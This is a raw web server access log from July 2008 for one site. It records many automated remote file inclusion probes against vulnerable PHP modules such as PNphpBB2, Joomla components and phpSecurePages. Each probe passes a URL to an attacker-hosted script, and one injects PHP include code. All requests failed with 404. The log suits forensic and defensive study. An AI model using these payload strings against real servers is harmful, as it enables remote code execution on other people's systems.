69.93.48.162 - - [06/Jul/2008:17:00:43 -0700] "GET /logs/access_080211.log//modules/PNphpBB2/includes/functions_admin.php?phpbb_root_path=ftp://81.177.8.194/Upload/trem/oldbisok?? HTTP/1.1" 404 275 "-" "libwww-perl/5.69" "neighborhoodglimpses.com"
69.93.48.162 - - [06/Jul/2008:17:00:44 -0700] "GET /logs/access_080211.log//modules/PNphpBB2/includes/functions_admin.php?phpbb_root_path=http://xxxxxx.xxxxx.xxx.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.69" "neighborhoodglimpses.com"
69.93.48.162 - - [06/Jul/2008:17:00:44 -0700] "GET //modules/PNphpBB2/includes/functions_admin.php?phpbb_root_path=ftp://81.177.8.194/Upload/trem/oldbisok?? HTTP/1.1" 404 275 "-" "libwww-perl/5.69" "neighborhoodglimpses.com"
69.93.48.162 - - [06/Jul/2008:17:00:44 -0700] "GET //modules/PNphpBB2/includes/functions_admin.php?phpbb_root_path=http://xxxxxx.xxxxx.xxx.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.69" "neighborhoodglimpses.com"
69.93.48.162 - - [06/Jul/2008:17:00:45 -0700] "GET /logs//modules/PNphpBB2/includes/functions_admin.php?phpbb_root_path=ftp://81.177.8.194/Upload/trem/oldbisok?? HTTP/1.1" 404 275 "-" "libwww-perl/5.69" "neighborhoodglimpses.com"
69.93.48.162 - - [06/Jul/2008:17:00:45 -0700] "GET /logs//modules/PNphpBB2/includes/functions_admin.php?phpbb_root_path=http://xxxxxx.xxxxx.xxx.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.69" "neighborhoodglimpses.com"
202.181.105.117 - - [06/Jul/2008:17:01:48 -0700] "GET /logs/access.log/index.php?p=http://www.wow-unbreakables.de/phpBB2//language/lang_english/email/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.neighborhoodglimpses.com"
202.181.105.117 - - [06/Jul/2008:17:01:48 -0700] "GET /index.php?p=http://www.wow-unbreakables.de/phpBB2//language/lang_english/email/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.neighborhoodglimpses.com"
202.181.105.117 - - [06/Jul/2008:17:01:48 -0700] "GET /logs/index.php?p=http://www.wow-unbreakables.de/phpBB2//language/lang_english/email/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.neighborhoodglimpses.com"
202.181.105.117 - - [06/Jul/2008:17:02:21 -0700] "GET /logs/access_080225.log/index.php?middle=http://www.wow-unbreakables.de/phpBB2//language/lang_english/email/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "neighborhoodglimpses.com"
202.181.105.117 - - [06/Jul/2008:17:02:21 -0700] "GET /logs/index.php?middle=http://www.wow-unbreakables.de/phpBB2//language/lang_english/email/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "neighborhoodglimpses.com"
202.181.105.117 - - [06/Jul/2008:17:02:21 -0700] "GET /index.php?middle=http://www.wow-unbreakables.de/phpBB2//language/lang_english/email/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "neighborhoodglimpses.com"
74.6.18.251 - - [06/Jul/2008:17:03:45 -0700] "GET /logs/access_080414.log HTTP/1.0" 200 6730446 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.neighborhoodglimpses.com"
59.126.46.141 - - [06/Jul/2008:17:05:04 -0700] "GET //modules/My_eGallery/public/displayCategory.php?scanpath=http://monmild.sitesled.com/test.txt? HTTP/1.1" 404 275 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)" "www.neighborhoodglimpses.com"
59.126.46.141 - - [06/Jul/2008:17:05:05 -0700] "GET /logs//modules/My_eGallery/public/displayCategory.php?scanpath=http://monmild.sitesled.com/test.txt? HTTP/1.1" 404 275 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)" "www.neighborhoodglimpses.com"
59.126.46.141 - - [06/Jul/2008:17:06:28 -0700] "GET //modules/vwar/admin/admin.php?vwar_root=http://monmild.sitesled.com/test.txt? HTTP/1.1" 404 275 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)" "www.neighborhoodglimpses.com"
59.126.46.141 - - [06/Jul/2008:17:06:28 -0700] "GET /logs//modules/vwar/admin/admin.php?vwar_root=http://monmild.sitesled.com/test.txt? HTTP/1.1" 404 275 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)" "www.neighborhoodglimpses.com"
82.98.78.150 - - [06/Jul/2008:17:13:43 -0700] "GET /logs/access.log/administrator/components/com_webring/admin.webring.docs.php?component_dir=http://www.euricolopes.net/portal/includes/sys.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.neighborhoodglimpses.com"
82.98.78.150 - - [06/Jul/2008:17:13:43 -0700] "GET /logs/administrator/components/com_webring/admin.webring.docs.php?component_dir=http://www.euricolopes.net/portal/includes/sys.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.neighborhoodglimpses.com"
64.38.22.250 - - [06/Jul/2008:17:14:13 -0700] "GET /logs/access.log///modules/PNphpBB2/includes/functions_admin.php?phpbb_root_path=http://www.cabildoonline.com/html/images/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.neighborhoodglimpses.com"
64.38.22.250 - - [06/Jul/2008:17:14:13 -0700] "GET ///modules/PNphpBB2/includes/functions_admin.php?phpbb_root_path=http://www.cabildoonline.com/html/images/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.neighborhoodglimpses.com"
64.38.22.250 - - [06/Jul/2008:17:14:14 -0700] "GET /logs///modules/PNphpBB2/includes/functions_admin.php?phpbb_root_path=http://www.cabildoonline.com/html/images/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.neighborhoodglimpses.com"
201.3.74.226 - - [06/Jul/2008:17:15:14 -0700] "GET /logs/access.log//index.php?name=PNphpBB2&file=viewtopic&t=8/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%2527.include($_GET[a]),exit.%2527&a=http://www.larisco.com/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.neighborhoodglimpses.com"
201.3.74.226 - - [06/Jul/2008:17:15:30 -0700] "GET //index.php?name=PNphpBB2&file=viewtopic&t=8/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%2527.include($_GET[a]),exit.%2527&a=http://www.larisco.com/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.neighborhoodglimpses.com"
201.3.74.226 - - [06/Jul/2008:17:15:36 -0700] "GET /logs//index.php?name=PNphpBB2&file=viewtopic&t=8/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%2527.include($_GET[a]),exit.%2527&a=http://www.larisco.com/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.neighborhoodglimpses.com"
66.76.60.39 - - [06/Jul/2008:17:16:58 -0700] "GET /logs/access_080211.log/components/com_performs/performs.php?mosConfig_absolute_path=http://creativ-s.ru/tmp/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "neighborhoodglimpses.com"
66.76.60.39 - - [06/Jul/2008:17:16:58 -0700] "GET /components/com_performs/performs.php?mosConfig_absolute_path=http://creativ-s.ru/tmp/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "neighborhoodglimpses.com"
66.76.60.39 - - [06/Jul/2008:17:16:58 -0700] "GET /logs/components/com_performs/performs.php?mosConfig_absolute_path=http://creativ-s.ru/tmp/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "neighborhoodglimpses.com"
201.130.79.34 - - [06/Jul/2008:17:17:30 -0700] "GET /logs//modules/PNphpBB2/includes/functions_admin.php?phpbb_root_path=http://middlestreet.org.uk/Timeline/.log/n??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.neighborhoodglimpses.com"
201.130.79.34 - - [06/Jul/2008:17:17:32 -0700] "GET //modules/PNphpBB2/includes/functions_admin.php?phpbb_root_path=http://middlestreet.org.uk/Timeline/.log/n??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.neighborhoodglimpses.com"
201.130.79.34 - - [06/Jul/2008:17:17:32 -0700] "GET /logs/access.log//modules/PNphpBB2/includes/functions_admin.php?phpbb_root_path=http://middlestreet.org.uk/Timeline/.log/n??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.neighborhoodglimpses.com"
201.130.79.34 - - [06/Jul/2008:17:17:59 -0700] "GET //modules/PNphpBB2/includes/functions_admin.php?phpbb_root_path=http://middlestreet.org.uk/Timeline/.log/n??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "neighborhoodglimpses.com"
201.130.79.34 - - [06/Jul/2008:17:17:59 -0700] "GET /logs/access_080211.log//modules/PNphpBB2/includes/functions_admin.php?phpbb_root_path=http://middlestreet.org.uk/Timeline/.log/n??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "neighborhoodglimpses.com"
201.130.79.34 - - [06/Jul/2008:17:18:00 -0700] "GET /logs//modules/PNphpBB2/includes/functions_admin.php?phpbb_root_path=http://middlestreet.org.uk/Timeline/.log/n??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "neighborhoodglimpses.com"
201.212.0.39 - - [06/Jul/2008:17:18:57 -0700] "GET /logs/access.log/index.php?sourcedir=http://creativ-s.ru/tmp/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.neighborhoodglimpses.com"
201.212.0.39 - - [06/Jul/2008:17:18:58 -0700] "GET /index.php?sourcedir=http://creativ-s.ru/tmp/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.neighborhoodglimpses.com"
201.212.0.39 - - [06/Jul/2008:17:18:59 -0700] "GET /logs/index.php?sourcedir=http://creativ-s.ru/tmp/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.neighborhoodglimpses.com"
202.181.105.117 - - [06/Jul/2008:17:21:16 -0700] "GET //modules/xgallery/upgrade_album.php?GALLERY_BASEDIR=http://www.wow-unbreakables.de/phpBB2//language/lang_english/email/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "neighborhoodglimpses.com"
202.181.105.117 - - [06/Jul/2008:17:21:16 -0700] "GET /logs/access_080211.log//modules/xgallery/upgrade_album.php?GALLERY_BASEDIR=http://www.wow-unbreakables.de/phpBB2//language/lang_english/email/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "neighborhoodglimpses.com"
202.181.105.117 - - [06/Jul/2008:17:21:16 -0700] "GET /logs//modules/xgallery/upgrade_album.php?GALLERY_BASEDIR=http://www.wow-unbreakables.de/phpBB2//language/lang_english/email/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "neighborhoodglimpses.com"
201.130.79.34 - - [06/Jul/2008:17:21:20 -0700] "GET //modules/PNphpBB2/includes/functions_admin.php?phpbb_root_path=http://middlestreet.org.uk/Timeline/.log/n??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.neighborhoodglimpses.com"
201.130.79.34 - - [06/Jul/2008:17:21:22 -0700] "GET /logs/access.log//modules/PNphpBB2/includes/functions_admin.php?phpbb_root_path=http://middlestreet.org.uk/Timeline/.log/n??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.neighborhoodglimpses.com"
201.130.79.34 - - [06/Jul/2008:17:21:22 -0700] "GET /logs//modules/PNphpBB2/includes/functions_admin.php?phpbb_root_path=http://middlestreet.org.uk/Timeline/.log/n??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.neighborhoodglimpses.com"
201.130.79.34 - - [06/Jul/2008:17:22:34 -0700] "GET /logs//modules/PNphpBB2/includes/functions_admin.php?phpbb_root_path=http://middlestreet.org.uk/Timeline/.log/n??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "neighborhoodglimpses.com"
201.130.79.34 - - [06/Jul/2008:17:22:34 -0700] "GET /logs/access_080211.log//modules/PNphpBB2/includes/functions_admin.php?phpbb_root_path=http://middlestreet.org.uk/Timeline/.log/n??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "neighborhoodglimpses.com"
201.130.79.34 - - [06/Jul/2008:17:22:37 -0700] "GET //modules/PNphpBB2/includes/functions_admin.php?phpbb_root_path=http://middlestreet.org.uk/Timeline/.log/n??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "neighborhoodglimpses.com"
64.38.22.250 - - [06/Jul/2008:17:22:40 -0700] "GET /logs/access.log//modules/tinycontent/admin/spaw/spaw_control.class.php?spaw_root=http://www.cabildoonline.com/html/images/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.neighborhoodglimpses.com"
64.38.22.250 - - [06/Jul/2008:17:22:41 -0700] "GET //modules/tinycontent/admin/spaw/spaw_control.class.php?spaw_root=http://www.cabildoonline.com/html/images/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.neighborhoodglimpses.com"
64.38.22.250 - - [06/Jul/2008:17:22:41 -0700] "GET /logs//modules/tinycontent/admin/spaw/spaw_control.class.php?spaw_root=http://www.cabildoonline.com/html/images/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.neighborhoodglimpses.com"
201.3.74.226 - - [06/Jul/2008:17:24:25 -0700] "GET /logs/access_071203.log//includes?vwar_root=http://www.larisco.com/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.neighborhoodglimpses.com"
201.3.74.226 - - [06/Jul/2008:17:24:31 -0700] "GET //includes?vwar_root=http://www.larisco.com/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.neighborhoodglimpses.com"
201.3.74.226 - - [06/Jul/2008:17:24:39 -0700] "GET /logs//includes?vwar_root=http://www.larisco.com/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.neighborhoodglimpses.com"
69.94.56.40 - - [06/Jul/2008:17:25:13 -0700] "GET /logs/access_080211.log/senetman/html/index.php?page=http://h1.ripway.com/deaddevil/id.txt? HTTP/1.0" 404 275 "-" "libwww-perl/5.48" "neighborhoodglimpses.com"
69.94.56.40 - - [06/Jul/2008:17:25:14 -0700] "GET /senetman/html/index.php?page=http://h1.ripway.com/deaddevil/id.txt? HTTP/1.0" 404 275 "-" "libwww-perl/5.48" "neighborhoodglimpses.com"
69.94.56.40 - - [06/Jul/2008:17:25:14 -0700] "GET /logs/senetman/html/index.php?page=http://h1.ripway.com/deaddevil/id.txt? HTTP/1.0" 404 275 "-" "libwww-perl/5.48" "neighborhoodglimpses.com"
202.181.105.117 - - [06/Jul/2008:17:25:37 -0700] "GET /logs/access.log//modules/xgallery/upgrade_album.php?GALLERY_BASEDIR=http://www.wow-unbreakables.de/phpBB2//language/lang_english/email/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.neighborhoodglimpses.com"
202.181.105.117 - - [06/Jul/2008:17:25:37 -0700] "GET /logs//modules/xgallery/upgrade_album.php?GALLERY_BASEDIR=http://www.wow-unbreakables.de/phpBB2//language/lang_english/email/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.neighborhoodglimpses.com"
202.181.105.117 - - [06/Jul/2008:17:25:37 -0700] "GET //modules/xgallery/upgrade_album.php?GALLERY_BASEDIR=http://www.wow-unbreakables.de/phpBB2//language/lang_english/email/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.neighborhoodglimpses.com"
82.98.78.150 - - [06/Jul/2008:17:26:16 -0700] "GET /logs/access_080414.log/administrator/components/com_webring/admin.webring.docs.php?component_dir=http://www.euricolopes.net/portal/includes/sys.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.neighborhoodglimpses.com"
216.193.201.57 - - [06/Jul/2008:17:29:03 -0700] "GET /logs/access.log//PNphpBB2/includes/functions_admin.php?phpbb_root_path=http://www.geocities.com/ojolah/find.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.75" "www.neighborhoodglimpses.com"
216.193.201.57 - - [06/Jul/2008:17:29:03 -0700] "GET //PNphpBB2/includes/functions_admin.php?phpbb_root_path=http://www.geocities.com/ojolah/find.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.75" "www.neighborhoodglimpses.com"
216.193.201.57 - - [06/Jul/2008:17:29:03 -0700] "GET /logs//PNphpBB2/includes/functions_admin.php?phpbb_root_path=http://www.geocities.com/ojolah/find.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.75" "www.neighborhoodglimpses.com"
217.16.26.124 - - [06/Jul/2008:17:31:55 -0700] "GET /logs//main.php?pageURL=http://www.neilhosker.net/myrid.txt?? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 7.0b; Windows NT 6.0)" "www.neighborhoodglimpses.com"
217.16.26.124 - - [06/Jul/2008:17:31:55 -0700] "GET //main.php?pageURL=http://www.neilhosker.net/myrid.txt?? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 7.0b; Windows NT 6.0)" "www.neighborhoodglimpses.com"
217.16.26.124 - - [06/Jul/2008:17:31:58 -0700] "GET //main.php?pageURL=http://www.neilhosker.net/myrid.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; it; rv:1.8.1b1) Gecko/20060710 Firefox/2.0b1" "www.neighborhoodglimpses.com"
217.16.26.124 - - [06/Jul/2008:17:31:58 -0700] "GET /logs//main.php?pageURL=http://www.neilhosker.net/myrid.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; it; rv:1.8.1b1) Gecko/20060710 Firefox/2.0b1" "www.neighborhoodglimpses.com"
193.178.228.12 - - [06/Jul/2008:17:31:59 -0700] "GET //main.php?pageURL=http://www.neilhosker.net/myrid.txt?? HTTP/1.1" 404 275 "-" "Microsoft Pocket Internet Explorer/0.6" "www.neighborhoodglimpses.com"
193.178.228.12 - - [06/Jul/2008:17:31:59 -0700] "GET /logs//main.php?pageURL=http://www.neilhosker.net/myrid.txt?? HTTP/1.1" 404 275 "-" "Microsoft Pocket Internet Explorer/0.6" "www.neighborhoodglimpses.com"
193.178.228.12 - - [06/Jul/2008:17:31:59 -0700] "GET /logs//main.php?pageURL=http://www.neilhosker.net/myrid.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Macintosh; U; PPC Mac OS X Mach-O; en-GB; rv:1.7.10) Gecko/20050717 Firefox/1.0.6" "www.neighborhoodglimpses.com"
193.178.228.12 - - [06/Jul/2008:17:31:59 -0700] "GET //main.php?pageURL=http://www.neilhosker.net/myrid.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Macintosh; U; PPC Mac OS X Mach-O; en-GB; rv:1.7.10) Gecko/20050717 Firefox/1.0.6" "www.neighborhoodglimpses.com"
216.121.199.191 - - [06/Jul/2008:17:34:17 -0700] "GET /logs/access_080211.log/require_once($rootdir.'/classes/php-gettext/gettext.php');http://www.elunacy.ca/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "neighborhoodglimpses.com"
216.121.199.191 - - [06/Jul/2008:17:34:17 -0700] "GET /require_once($rootdir.'/classes/php-gettext/gettext.php');http://www.elunacy.ca/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "neighborhoodglimpses.com"
216.121.199.191 - - [06/Jul/2008:17:34:17 -0700] "GET /logs/require_once($rootdir.'/classes/php-gettext/gettext.php');http://www.elunacy.ca/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "neighborhoodglimpses.com"
222.251.223.180 - - [06/Jul/2008:17:38:12 -0700] "GET /logs/access.log/components/com_performs/performs.php?mosConfig_absolute_path=http://hostbox3.awardspace.com/botloginMIB.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.neighborhoodglimpses.com"
222.251.223.180 - - [06/Jul/2008:17:38:13 -0700] "GET /components/com_performs/performs.php?mosConfig_absolute_path=http://hostbox3.awardspace.com/botloginMIB.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.neighborhoodglimpses.com"
222.251.223.180 - - [06/Jul/2008:17:38:13 -0700] "GET /logs/components/com_performs/performs.php?mosConfig_absolute_path=http://hostbox3.awardspace.com/botloginMIB.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.neighborhoodglimpses.com"
193.178.228.12 - - [06/Jul/2008:17:38:38 -0700] "GET /logs/access.log//main.php?pageURL=http://www.neilhosker.net//myrid.txt?????? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.neighborhoodglimpses.com"
193.178.228.12 - - [06/Jul/2008:17:38:38 -0700] "GET //main.php?pageURL=http://www.neilhosker.net//myrid.txt?????? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.neighborhoodglimpses.com"
193.178.228.12 - - [06/Jul/2008:17:38:39 -0700] "GET /logs//main.php?pageURL=http://www.neilhosker.net//myrid.txt?????? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.neighborhoodglimpses.com"
64.38.22.250 - - [06/Jul/2008:17:40:08 -0700] "GET /logs/access_071105.log//modules/tinycontent/admin/spaw/spaw_control.class.php?spaw_root=http://www.cabildoonline.com/html/images/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.neighborhoodglimpses.com"
66.76.60.39 - - [06/Jul/2008:17:41:06 -0700] "GET /components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://creativ-s.ru/tmp/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "neighborhoodglimpses.com"
202.181.105.117 - - [06/Jul/2008:17:41:23 -0700] "GET /logs/access_080211.log/order.php?p=http://www.wow-unbreakables.de/phpBB2//language/lang_english/email/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "neighborhoodglimpses.com"
202.181.105.117 - - [06/Jul/2008:17:41:23 -0700] "GET /order.php?p=http://www.wow-unbreakables.de/phpBB2//language/lang_english/email/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "neighborhoodglimpses.com"
202.181.105.117 - - [06/Jul/2008:17:41:23 -0700] "GET /logs/order.php?p=http://www.wow-unbreakables.de/phpBB2//language/lang_english/email/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "neighborhoodglimpses.com"
66.76.60.39 - - [06/Jul/2008:17:41:29 -0700] "GET /components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://creativ-s.ru/tmp/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.neighborhoodglimpses.com"
201.212.0.39 - - [06/Jul/2008:17:42:25 -0700] "GET /logs/access_080211.log/index.php?sourcedir=http://creativ-s.ru/tmp/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "neighborhoodglimpses.com"
201.212.0.39 - - [06/Jul/2008:17:42:39 -0700] "GET /index.php?sourcedir=http://creativ-s.ru/tmp/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "neighborhoodglimpses.com"
201.212.0.39 - - [06/Jul/2008:17:42:53 -0700] "GET /logs/index.php?sourcedir=http://creativ-s.ru/tmp/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "neighborhoodglimpses.com"
194.244.187.12 - - [06/Jul/2008:17:44:23 -0700] "GET /logs/components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://creativ-s.ru/tmp/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.neighborhoodglimpses.com"
194.244.187.12 - - [06/Jul/2008:17:44:24 -0700] "GET /components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://creativ-s.ru/tmp/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.neighborhoodglimpses.com"
67.19.130.218 - - [06/Jul/2008:17:45:19 -0700] "GET //phpsecurityadmin/include/logout.php?PSA_PATH=http://www.infostec.net/ids/test.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.7.12) Gecko/20050915 Firefox/1.0.7" "www.neighborhoodglimpses.com"
67.19.130.218 - - [06/Jul/2008:17:45:19 -0700] "GET /logs//phpsecurityadmin/include/logout.php?PSA_PATH=http://www.infostec.net/ids/test.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.7.12) Gecko/20050915 Firefox/1.0.7" "www.neighborhoodglimpses.com"
67.19.130.218 - - [06/Jul/2008:17:45:20 -0700] "GET /logs//phpsecurityadmin/include/logout.php?PSA_PATH=http://www.infostec.net/ids/test.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.7.12) Gecko/20050915 Firefox/1.0.7" "neighborhoodglimpses.com"
67.19.130.218 - - [06/Jul/2008:17:45:20 -0700] "GET //phpsecurityadmin/include/logout.php?PSA_PATH=http://www.infostec.net/ids/test.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.7.12) Gecko/20050915 Firefox/1.0.7" "neighborhoodglimpses.com"
58.229.117.42 - - [06/Jul/2008:17:47:35 -0700] "GET /components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://www.spices.res.in/biotraineeship.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "neighborhoodglimpses.com"
58.229.117.42 - - [06/Jul/2008:17:47:58 -0700] "GET /components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://www.spices.res.in/biotraineeship.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.neighborhoodglimpses.com"
66.76.60.39 - - [06/Jul/2008:17:48:28 -0700] "GET /logs/access_080211.log/components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://creativ-s.ru/tmp/id.txt????? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "neighborhoodglimpses.com"
66.76.60.39 - - [06/Jul/2008:17:48:28 -0700] "GET /components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://creativ-s.ru/tmp/id.txt????? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "neighborhoodglimpses.com"
66.76.60.39 - - [06/Jul/2008:17:48:28 -0700] "GET /logs/components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://creativ-s.ru/tmp/id.txt????? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "neighborhoodglimpses.com"
217.17.17.82 - - [06/Jul/2008:17:49:22 -0700] "GET //phpSecurePages/secure.php?&cfgProgDir=http://www.informatizados.es/docs/coi.txt???? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 5.17; Mac_PowerPC)" "neighborhoodglimpses.com"
217.17.17.82 - - [06/Jul/2008:17:49:22 -0700] "GET /logs//phpSecurePages/secure.php?&cfgProgDir=http://www.informatizados.es/docs/coi.txt???? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 5.17; Mac_PowerPC)" "neighborhoodglimpses.com"
217.17.17.82 - - [06/Jul/2008:17:49:23 -0700] "GET //phpSecurePages/secure.php?&cfgProgDir=http://5score.org/calendar/info/test.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Macintosh; U; PPC Mac OS X Mach-O; en-GB; rv:1.7.10) Gecko/20050717 Firefox/1.0.6" "neighborhoodglimpses.com"
217.17.17.82 - - [06/Jul/2008:17:49:23 -0700] "GET /logs//phpSecurePages/secure.php?&cfgProgDir=http://5score.org/calendar/info/test.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Macintosh; U; PPC Mac OS X Mach-O; en-GB; rv:1.7.10) Gecko/20050717 Firefox/1.0.6" "neighborhoodglimpses.com"
70.85.96.130 - - [06/Jul/2008:17:49:24 -0700] "GET /logs/access_071203.log/language/lang_german/lang_main_album.php?phpbb_root_path=http://francealacarte.net/templates/sida6_4.gif????????????????????????????? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.neighborhoodglimpses.com"
70.85.96.130 - - [06/Jul/2008:17:49:24 -0700] "GET /language/lang_german/lang_main_album.php?phpbb_root_path=http://francealacarte.net/templates/sida6_4.gif????????????????????????????? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.neighborhoodglimpses.com"
70.85.96.130 - - [06/Jul/2008:17:49:25 -0700] "GET /logs/language/lang_german/lang_main_album.php?phpbb_root_path=http://francealacarte.net/templates/sida6_4.gif????????????????????????????? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.neighborhoodglimpses.com"
64.246.22.32 - - [06/Jul/2008:17:49:47 -0700] "GET /logs/access.log//phpsecurityadmin/include/logout.php?PSA_PATH=http://h1.ripway.com/rastamania/id2.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.neighborhoodglimpses.com"
64.246.22.32 - - [06/Jul/2008:17:49:47 -0700] "GET //phpsecurityadmin/include/logout.php?PSA_PATH=http://h1.ripway.com/rastamania/id2.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.neighborhoodglimpses.com"
64.246.22.32 - - [06/Jul/2008:17:49:47 -0700] "GET /logs//phpsecurityadmin/include/logout.php?PSA_PATH=http://h1.ripway.com/rastamania/id2.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.neighborhoodglimpses.com"
